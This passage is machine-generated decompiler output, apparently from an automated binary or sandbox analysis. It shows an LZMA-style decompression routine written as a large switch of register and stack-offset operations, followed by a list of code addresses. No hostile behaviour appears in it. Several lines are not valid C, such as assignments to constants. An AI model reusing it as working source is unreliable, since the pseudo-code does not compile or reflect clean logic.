						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406f4a
0x00406f4a
0x00406f4e
0x00407005
0x00407008
0x00407014
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406f54
0x00406f58
0x00407499
0x00407499
0x0040749c
0x004074a0
0x004074a0
0x00406f5e
0x00406f64
0x00406f67
0x00406f6b
0x00406f6e
0x00406f72
0x00407438
0x00407484
0x0040748c
0x00407493
0x00407495
0x00000000
0x00407495
0x00406f78
0x00406f7b
0x00406f81
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
